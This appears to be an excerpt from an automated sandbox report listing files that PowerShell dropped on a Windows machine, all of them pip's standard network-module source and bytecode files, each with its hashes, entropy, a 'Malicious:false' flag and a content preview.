                                                                                                                                                                                                              Preview:.........j.e=P.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#m$Z$m%Z%m&Z&m'Z'..d.d.l(m)Z)....e!e*........Z+d.a,..G.d...d.e.........Z-..G.d...d.e.........Z...G.d...d.e.........Z/..G.d...d.e.........Z0..G.d...d.e.........Z1..e.d...........d.e2d.e.f.d...........Z3..G.d...d.e.........Z4y.).z.Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests.......N)...ABC..abstractmethod)...lru_cache)...commonprefix)...Path)...Any..Dict..List..NamedTuple..Optional..Tuple)...AuthBase..HTTPBasicAuth)...Request..Response)...get_netrc_auth)...getLogger)...ask..ask_input..ask_password..remove_auth_from_url..split_auth_netloc_from_url)...AuthInfoFc.....................,.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.d.<...y
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6532
                                                                                                                                                                                                              Entropy (8bit):5.317007977503391
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:BQktw0ENOtSKYrAdjB97K7h1ekKg7j03mgFPnB:Okq0ENOpLK7ne1g7I/PB
                                                                                                                                                                                                              MD5:B9AEAB0223BDC5E33842EB8302C083E6
                                                                                                                                                                                                              SHA1:688AABD06DA515629C40CB69BD21AF37BC118720
                                                                                                                                                                                                              SHA-256:16BB51167DB90FB79B7BE16F072EE4D756E8508328691339A72EE5C91F6536DD
                                                                                                                                                                                                              SHA-512:CE77085504E443338A8C5CC88051326E3A39197D9B65B59A9364F5B98A40ACBA3F310377F16CFCA59DEC49E30579907F0B576968A2C39343098FDCB90B9CCD4C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e_...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.e.d.e.d.....f.d...........Z...G.d...d.e.........Z.y.).z.HTTP cache implementation.......N)...contextmanager)...datetime)...BinaryIO..Generator..Optional..Union)...SeparateBodyBaseCache)...SeparateBodyFileCache)...Response)...adjacent_tmp_file..replace)...ensure_dir..response..returnc...........................t.........|.d.d.........S.).N..from_cacheF)...getattr).r....s.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/cache.py..is_from_cacher........s..........8.\.5..1..1.....).NNNc................#....4...K.......d.......y.#.t.........$.r...Y.y.w.x.Y.w...w.).zvIf we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. N)...OSError..r....r......suppressed_cache_errorsr........s...........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8564
                                                                                                                                                                                                              Entropy (8bit):5.372632453463237
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:dlJc3fTWKcFJ3YHTZteuu2QZMX+7/UTGv8yjztv3:nS3CKcFdYHuuCn7MqvFlv3
                                                                                                                                                                                                              MD5:3C4BA7754FFDA52F34159E4B50639E53
                                                                                                                                                                                                              SHA1:1F6B4397D948FFB415FF7BD4AB2172A4F783F7F7
                                                                                                                                                                                                              SHA-256:65B380B423B103EF443EDD8BA381072D4CEE0B1607E9DD32836144EC98A9A649
                                                                                                                                                                                                              SHA-512:9C38086BA38F4E08A37139365238770592DF0C957AA5B917FC7E3DBEAB6955E823BFC409171F7BCF2D2C0D410F0E7AD109283D8735EA5775477906C3BB32253A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z ....e.jB..................e"........Z#d.e.d.e.e$....f.d...Z%d.e.d.e.d.e&d.e.e'....f.d...Z(d.e&d.e&f.d...Z)d.e&d.e&d.e&f.d...Z*d.e.d.e.d.e&f.d...Z+d.e.d.e.d.e.f.d...Z,..G.d...d.........Z-..G.d...d.........Z.y.).z)Download files with progress indicators.......N)...Iterable..Optional..Tuple)...CONTENT_CHUNK_SIZE..Response)...get_download_progress_renderer)...NetworkConnectionError)...PyPI)...Link)...is_from_cache)...PipSession)...HEADERS..raise_for_status..response_chunks)...format_size..redact_auth_from_url..splitext..resp..returnc.....................h.......t.........|.j...................d.............S.#.t.........t.........t.........f.$.r...Y.y.w.x.Y.w.).Nz.content-length)...int..headers..ValueError..KeyError..TypeError).r....s.... .rC:\Users\Administrator\AppD
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11677
                                                                                                                                                                                                              Entropy (8bit):5.4057025096241675
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:2F2KFuQcQoJ6DizpnyIDLLh3fbpwAHWQfpOSsOB5qMTn:2F29QboQ4pyMLLhTpwS0SJB5qun
                                                                                                                                                                                                              MD5:D1E397214E05D40BDB8FAEB58127A7F1
                                                                                                                                                                                                              SHA1:A79641C175335877D68CF0FD594A77D6B4965600
                                                                                                                                                                                                              SHA-256:4A0090E5ADECED19C837D0054DC02C7E4125BA4D96B2567557E488F3F0D3AD45
                                                                                                                                                                                                              SHA-512:5217D502634F51131794A4DBDBB986F82A4B08A3CF781009547E783DDDB582E08850FA2E9B54615FCA0E6227038A6984FD49F0D6B4F55DEAFB08A11F6D96443C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................d.Z.d.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!....G.d...d.e"........Z#d.e$d.e$d.e.d.e.f.d...Z%..G.d...d.........Z&y.).z.Lazy ZIP over HTTP..HTTPRangeRequestUnsupported..dist_from_wheel_url.....)...bisect_left..bisect_right)...contextmanager)...NamedTemporaryFile)...Any..Dict..Generator..List..Optional..Tuple)...BadZipFile..ZipFile)...canonicalize_name)...CONTENT_CHUNK_SIZE..Response)...BaseDistribution..MemoryWheel..get_wheel_distribution)...PipSession)...HEADERS..raise_for_status..response_chunksc...........................e.Z.d.Z.y.).r....N)...__name__..__module__..__qualname__........tC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/lazy_wheel.pyr....r........s.........r .....name..url..session..returnc..........................t.........|.|.........5.}.t.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18791
                                                                                                                                                                                                              Entropy (8bit):5.508828887551784
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:SA5OzATqK1yo9Uhmo3ZcmrVDW34lNfouw7CIFv+hF6zrN:SA5OCUcgnfO+hFMrN
                                                                                                                                                                                                              MD5:BFEEBEADB31C4C8F16BDC8C04BC9CD35
                                                                                                                                                                                                              SHA1:89B99451E1EE97645F574324355B3ED944C7EC95
                                                                                                                                                                                                              SHA-256:F5CC9160C95B3781A67F440F868D74163C35A17342337422751745EF2E9DD6BC
                                                                                                                                                                                                              SHA-512:B40A3CF0BE75AFABD793BB11DC07CD34AD4FE633CF63A9D36F3EE6D6399FDF93811409C4FD086A7989BF0CD7F48B6BB186894464A3069041288ADB6330405276
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e.I..............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z ..d.d.l!m"Z"m#Z#..d.d.l!m$Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>m?Z?..d.d.l@mAZA..e.r.d.d.lBmCZC..d.d.lDmEZE....e.j...................eG........ZHe.eIeIe.e.eJeIf.........f.....ZK..e.j...................d.e.............g.d...ZMe.eK....eNd.<...d.ZOd.ePf.d...ZQd.eIf.d...ZR..G.d...d e#........ZS..G.d!..d"........ZT..G.d#..d$eTe%........Z$..G.d%..d&eTe ........Z...G.d'..d(e$........ZU..G.d)..d*e.........ZV..G.d+..d,e.j...........................ZXy.)-zhPipSession and supporting code, containing all pip-specific.network request configuration and behavior.......N)...TYPE_CHECKING..Any..Dict..Generator..List..Mapping..Optional..Sequence..Tuple..Union)...reques
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2270
                                                                                                                                                                                                              Entropy (8bit):5.565464819838446
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:368uaLawawkR5fTDUFH9t2ev1U4a4IfbMkQT7g4qJYQ0n:3MwbkBQFHz64gdQg4qYQ0n
                                                                                                                                                                                                              MD5:E55DA55B9B3088392A18A0A1702AB790
                                                                                                                                                                                                              SHA1:6657AEB37C6567D2E6C94D7A37C3C069A32574DF
                                                                                                                                                                                                              SHA-256:DDC81985B99D1B157A6657CA668891382653B2352BADB5925536B336222D872C
                                                                                                                                                                                                              SHA-512:58EA1633E8CFC0C140BC2A9E8C58A7FE5480D6D1E6513EDF3F94FE175129A0655E5DDE65C6F883E07E2735B916DA9B8D6BFD179D313EBEC3A57336D72CE704F3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................U.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.i.Z.e.e.e.f.....e.d.<...d.e.d.d.f.d...Z.e.f.d.e.d.e.d.e.e.d.d.f.....f.d...Z.y.)......)...Dict..Generator)...CONTENT_CHUNK_SIZE..Response)...NetworkConnectionErrorz.Accept-Encoding..identity..HEADERS..resp..returnNc...........................d.}.t.........|.j...................t.................r...|.j...................j...................d.........}.n.|.j...................}.d.|.j...................c.x.k...r.d.k...r"n...n.|.j.....................d.|...d.|.j.......................}.n6d.|.j...................c.x.k...r.d.k...r!n...n.|.j.....................d.|...d.|.j.......................}.|.r.t.........|.|.............y.#.t.........$.r...|.j...................j...................d.........}.Y...w.x.Y.w.).N..z.utf-8z.iso-8859-1i....i....z. Client Error: z. for url: iX...z. Server Error: )...response)...isinstance..reason..bytes..decode..UnicodeDecodeError..status_code..urlr....).r......http_er
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2961
                                                                                                                                                                                                              Entropy (8bit):5.445847074251416
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:wSB++JWLcdP++/1eqoZ4f2/BX30SljugoDmsJ5c60687i6llPLmR:Q+JWLcc+dsHjvs3c6z0L2
                                                                                                                                                                                                              MD5:80A9EC091F05799A916A130DDBC4D3CA
                                                                                                                                                                                                              SHA1:7557F636CFF9995E4FD3E36245CEA97B00EF7A1D
                                                                                                                                                                                                              SHA-256:63625C68B9AC265442BD79D14B1917DA850607C886F38C548048ECCF046DAA61
                                                                                                                                                                                                              SHA-512:670562DD67656C5C8DC9DC1F020A098CF3F8DE70C3BC5AB4659D7B6EE67BC90BC2E3980ED7666F705DFD700997FEEF7075DB89C1EA8708F81879A921D84B7C08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j&..................e.........Z...G.d...d.e.j,..................j...........................Z.y.).z#xmlrpclib.Transport implementation......N)...TYPE_CHECKING..Tuple)...NetworkConnectionError)...PipSession)...raise_for_status)..._HostType.._Marshallable)...SizedBufferc.....................^.......e.Z.d.Z.d.Z...d.d.e.d.e.d.e.d.d.f...f.d...Z...d.d.d.d.e.d.d.d.e.d.e.d.....f.d...Z...x.Z.S.)...PipXmlrpcTransportzRProvide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. ..index_url..session..use_datetime..returnNc............................t...........|.....|...........t.........j...................j...................|.........}.|.j...................|._.........|.|._.........y.).N)...super..__init__..urllib..parse..urlparse..scheme.._scheme.._session)...selfr....r....r......index_parts..__class__s....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20541
                                                                                                                                                                                                              Entropy (8bit):4.419441847140077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:GaxaV08sO0OLp5haOVKX2D/k5EzOEJlRL+jqrsLRjcqsWIv3LfW7Mvi+gIQFuRnG:Gaxa1p7kSTRiOQLxlITLqNXkB64oig6O
                                                                                                                                                                                                              MD5:1D3CF7B4C916B82AED3878328B7A9C00
                                                                                                                                                                                                              SHA1:B3C8663B501DE3A9B1A17EB858C83621158A3BF3
                                                                                                                                                                                                              SHA-256:4C2F8E716D8A5385BA475854E2A3E0417BD51F9E1A7400A9673EAC5AAF91F4D0
                                                                                                                                                                                                              SHA-512:BC4BC794485A676FE44A19ECE5EFDDC8EA0F012BDEABB389BEBD0171EA9BA385CCDCD1CF5203833728D1BA2B96E24B07A825EFD020AD3321822EAECAF434DFFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests..""".import logging.import os.import shutil.import subprocess.import sysconfig.import typing.import urllib.parse.from abc import ABC, abstractmethod.from functools import lru_cache.from os.path import commonprefix.from pathlib import Path.from typing import Any, Dict, List, NamedTuple, Optional, Tuple..from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth.from pip._vendor.requests.models import Request, Response.from pip._vendor.requests.utils import get_netrc_auth..from pip._internal.utils.logging import getLogger.from pip._internal.utils.misc import (. ask,. ask_input,. ask_password,. remove_auth_from_url,. split_auth_netloc_from_url,.).from pip._internal.vcs.versioncontrol import AuthInfo..logger = getLogger(__name__)..KEYRING_DISABLED = False...class Credentials(NamedTuple):. url: str. usernam
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3935
                                                                                                                                                                                                              Entropy (8bit):4.5367459930518805
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:eatn8+Vt8CLtSKYrAdjB98ic5XENd02jagd02t/:VtjHpplcyPjaqPt/
                                                                                                                                                                                                              MD5:BD5623B783BCC7693C921082172F561C
                                                                                                                                                                                                              SHA1:2521F1CC06B3F0DC49CFAA39223E69BEA749BFA7
                                                                                                                                                                                                              SHA-256:E3C03DEF5A82CCA345BE46F9EEE18493BFB4C5AA8F4B41D68F6EF5D50353C645
                                                                                                                                                                                                              SHA-512:531BCD976F686F08C297C847D824FF2AC07AB2EB4FE4FC681D48203843A887CC31DEF5DA0BD674639A84E2DE545EAEA393AFCCE022171558A405493198024B9C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""HTTP cache implementation.."""..import os.from contextlib import contextmanager.from datetime import datetime.from typing import BinaryIO, Generator, Optional, Union..from pip._vendor.cachecontrol.cache import SeparateBodyBaseCache.from pip._vendor.cachecontrol.caches import SeparateBodyFileCache.from pip._vendor.requests.models import Response..from pip._internal.utils.filesystem import adjacent_tmp_file, replace.from pip._internal.utils.misc import ensure_dir...def is_from_cache(response: Response) -> bool:. return getattr(response, "from_cache", False)...@contextmanager.def suppressed_cache_errors() -> Generator[None, None, None]:. """If we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. """. try:. yield. except OSError:. pass...class SafeFileCache(SeparateBodyBaseCache):. """. A file based cache which is safe to use even when the target directory may. not be accessible or writable.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6086
                                                                                                                                                                                                              Entropy (8bit):4.535167015839178
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:w7W+0c7gLaX0VXLCrMiZZb0r3FAlBEm+1swUGgsMtG+1sAXhxe1Nw:w7t7xA+rLZZbe+lqJ2x
                                                                                                                                                                                                              MD5:33EE21DB91B4122F1E32ED1E8EA926E6
                                                                                                                                                                                                              SHA1:69610A1F064A6FAC3514A158BB4B45A4EED5D672
                                                                                                                                                                                                              SHA-256:8B44E7E79083E43ED7604158DD3C6261A09FD0E69A4D0E9249C3600AC49E575E
                                                                                                                                                                                                              SHA-512:4F1835E1F37F586F38A6DC091FF63ACEA677B678A4B635922A7949830CC7E3B09CB6E87250A4F870D7DEF636C90CEEFF4463D6555F280FFE46B078B0C43BA2A4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Download files with progress indicators..""".import email.message.import logging.import mimetypes.import os.from typing import Iterable, Optional, Tuple..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.cli.progress_bars import get_download_progress_renderer.from pip._internal.exceptions import NetworkConnectionError.from pip._internal.models.index import PyPI.from pip._internal.models.link import Link.from pip._internal.network.cache import is_from_cache.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks.from pip._internal.utils.misc import format_size, redact_auth_from_url, splitext..logger = logging.getLogger(__name__)...def _get_http_response_size(resp: Response) -> Optional[int]:. try:. return int(resp.headers["content-length"]). except (ValueError, KeyError, TypeError):. return None...def _prepare_download(. resp: Response,. lin
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7638
                                                                                                                                                                                                              Entropy (8bit):4.533018537440655
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:lmeq3Fhp8FzQpt6uga8eTs/ChNn0dutBcBU88DDrUdWPpi0PB/Ql:PyKFK6u0qs/s0IoUnzUdWPPxY
                                                                                                                                                                                                              MD5:4C80D4FD2859B4B10C585AACC0F95FCA
                                                                                                                                                                                                              SHA1:90F90B661EFB4AE55C9C0E5174C5F3F36128F344
                                                                                                                                                                                                              SHA-256:D8F5D576E6193C23D99244057B527519B7C725678253EF855E89C6C887F0F5E5
                                                                                                                                                                                                              SHA-512:AB278D291E57C3D8DA0AD3DD055A61C78D0512FECCEB3D89D12512EF5295CAEF23D0BD07E4D67EE8158B1D7A100FD9793745A327E059C82C950C5E69539954FA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Lazy ZIP over HTTP"""..__all__ = ["HTTPRangeRequestUnsupported", "dist_from_wheel_url"]..from bisect import bisect_left, bisect_right.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from typing import Any, Dict, Generator, List, Optional, Tuple.from zipfile import BadZipFile, ZipFile..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.metadata import BaseDistribution, MemoryWheel, get_wheel_distribution.from pip._internal.network.session import PipSession.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks...class HTTPRangeRequestUnsupported(Exception):. pass...def dist_from_wheel_url(name: str, url: str, session: PipSession) -> BaseDistribution:. """Return a distribution object from the given wheel URL... This uses HTTP range requests to only fetch the portion of the wheel. containing metadata, just enough for the o
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18698
                                                                                                                                                                                                              Entropy (8bit):4.5751244682162
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:yeSx8+6E6RtPmwaJDzMzK64lU61dg5cfJfWMhjP3Cn+N8Y9kMs3SZY45Y5yrGH3R:yrx5hqtPSLCqP0yG4OjH30e
                                                                                                                                                                                                              MD5:ED400E3CC8FE5CF4936A8A63056F2652
                                                                                                                                                                                                              SHA1:4AE82ECA21AF93318FBD8419A0BEF7C8350AC27B
                                                                                                                                                                                                              SHA-256:F6DA840C3F0989568576994E117271368F5C8D17C167A4486B4C9043FA813623
                                                                                                                                                                                                              SHA-512:5EA9E5BEE9E50A2E2A7C66135C313E1C6D295CC0532004B2CF4A97E041E7AE86B269F4F57C8AE6B349673E18FF22AC47B3DF0DE8B1FB8293CCF2BCB8301083EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""PipSession and supporting code, containing all pip-specific.network request configuration and behavior.."""..import email.utils.import io.import ipaddress.import json.import logging.import mimetypes.import os.import platform.import shutil.import subprocess.import sys.import urllib.parse.import warnings.from typing import (. TYPE_CHECKING,. Any,. Dict,. Generator,. List,. Mapping,. Optional,. Sequence,. Tuple,. Union,.)..from pip._vendor import requests, urllib3.from pip._vendor.cachecontrol import CacheControlAdapter as _BaseCacheControlAdapter.from pip._vendor.requests.adapters import DEFAULT_POOLBLOCK, BaseAdapter.from pip._vendor.requests.adapters import HTTPAdapter as _BaseHTTPAdapter.from pip._vendor.requests.models import PreparedRequest, Response.from pip._vendor.requests.structures import CaseInsensitiveDict.from pip._vendor.urllib3.connectionpool import ConnectionPool.from pip._vendor.urllib3.exceptions import InsecureRequestWarning..from pip i
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4073
                                                                                                                                                                                                              Entropy (8bit):4.467621998619944
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AyJmdmk/IlIqS8Jz8ZFy2u/u2EPqg9d+Ha+IIIbgmoj0:AmmYkF8JIjyJm/Pqg9d+HauJ0
                                                                                                                                                                                                              MD5:753632450165D0EFF8C4751A18D5CCE5
                                                                                                                                                                                                              SHA1:A2F5A9510319D95ADE4777BF462996CD0456E6E7
                                                                                                                                                                                                              SHA-256:E80E52AD42441141F16C6B5BB1CC14D8DA42CB3FB7CED883946587A51461B09F
                                                                                                                                                                                                              SHA-512:8549E7FC56D2D224AFA391AA6C1C884FB5B665BE38D469E139B18837A622D7E4E99CB59A827F3BB770562AD59CD9E6FB71619D786B41759ED7D9E468BD45F43C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Dict, Generator..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.exceptions import NetworkConnectionError..# The following comments and HTTP headers were originally added by.# Donald Stufft in git commit 22c562429a61bb77172039e480873fb239dd8c03..#.# We use Accept-Encoding: identity here because requests defaults to.# accepting compressed responses. This breaks in a variety of ways.# depending on how the server is configured..# - Some servers will notice that the file isn't a compressible file.# and will leave the file alone and with an empty Content-Encoding.# - Some servers will notice that the file is already compressed and.# will leave the file alone, adding a Content-Encoding: gzip header.# - Some servers won't notice anything at all and will take a file.# that's already been compressed and compress it again, and set.# the Content-Encoding: gzip header.# By setting this to request only the identity encoding we're h
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1838
                                                                                                                                                                                                              Entropy (8bit):4.43781542816708
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:yb9H7vgk5JYfH6+/1GFPzdvsJTxW9KMOWP:ap35Jya+dSP2JVQOWP
                                                                                                                                                                                                              MD5:48F03AE3E7D166533D1FE1C50465C95E
                                                                                                                                                                                                              SHA1:1B9D05D0166567A0F7B6D0295E5450CE8627CB64
                                                                                                                                                                                                              SHA-256:B00C7339A709F8DD4D5C63EF6A9F630B7CEE6164A79EFDC65ED811DBE13600F0
                                                                                                                                                                                                              SHA-512:F6F196C93BF36CA05C3B7D66F922D3278C85014F601B6A147F582A696770F146C08FA989279054AF80ACAC63FBB8A106EF8F1D87F70F2CD4870899E153B15E61
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""xmlrpclib.Transport implementation."""..import logging.import urllib.parse.import xmlrpc.client.from typing import TYPE_CHECKING, Tuple..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status..if TYPE_CHECKING:. from xmlrpc.client import _HostType, _Marshallable.. from _typeshed import SizedBuffer..logger = logging.getLogger(__name__)...class PipXmlrpcTransport(xmlrpc.client.Transport):. """Provide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. """.. def __init__(. self, index_url: str, session: PipSession, use_datetime: bool = False. ) -> None:. super().__init__(use_datetime). index_parts = urllib.parse.urlparse(index_url). self._scheme = index_parts.scheme. self._session = session.. def request(. self,. host: "_HostType",. handler: str,. request_body: "SizedBuff
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                              Entropy (8bit):4.765767895983964
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:L2/VneB95/n23d6oAreKAqAIZ6Iaatgem/l:i/Vel/2ImbsZjaatHmt
                                                                                                                                                                                                              MD5:3A9E4E0100E45F01891B5C02311F9754
                                                                                                                                                                                                              SHA1:18A41C01546511991344CCF959F62D567981D4F7
                                                                                                                                                                                                              SHA-256:6FA7E25B8E5BBCBF33A5A0D6350689F4223A35E6656B8983BFC18DAC65DA26A2
                                                                                                                                                                                                              SHA-512:09A21CB7AEBDD86DD266557386841F91C0E45CA36D03E4873FF87F76DC5438D0924C5416211E3D5A1C94C9D4704EFF7CB31D7C21D4541291FDD46CCEA77B7500
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................y.).N..r..........uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7596
                                                                                                                                                                                                              Entropy (8bit):5.618716612684369
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:4t3UWTJ1ljY5AxTXr1ysXCvBpvscGpyvv01aiY0//xB8a0x6qAPSu0Zbh:4tEWF1lEE0pkcGpyvv0T7/n8aPqu0ZF
                                                                                                                                                                                                              MD5:25EA89F2828153EE79CE7D4A1750AD92
                                                                                                                                                                                                              SHA1:7C94BBFE17478DEA3EB00D64C5B98E64CBBB68F9
                                                                                                                                                                                                              SHA-256:C3B89F72D868FCFA3F4FBABEAA78356DD2D26762F639878904C57BC0FF542B21
                                                                                                                                                                                                              SHA-512:3DBF99E8D6918213DA3CB9EEF8EE4034AC8ECAC47D8CD0267676A004A2A35958110D137BEDB431DC0FAD6E4AB32BA125072D1CDA960C97A7990EE4907BC6C69B
                                                                                                                                                                                                              Malicious:false
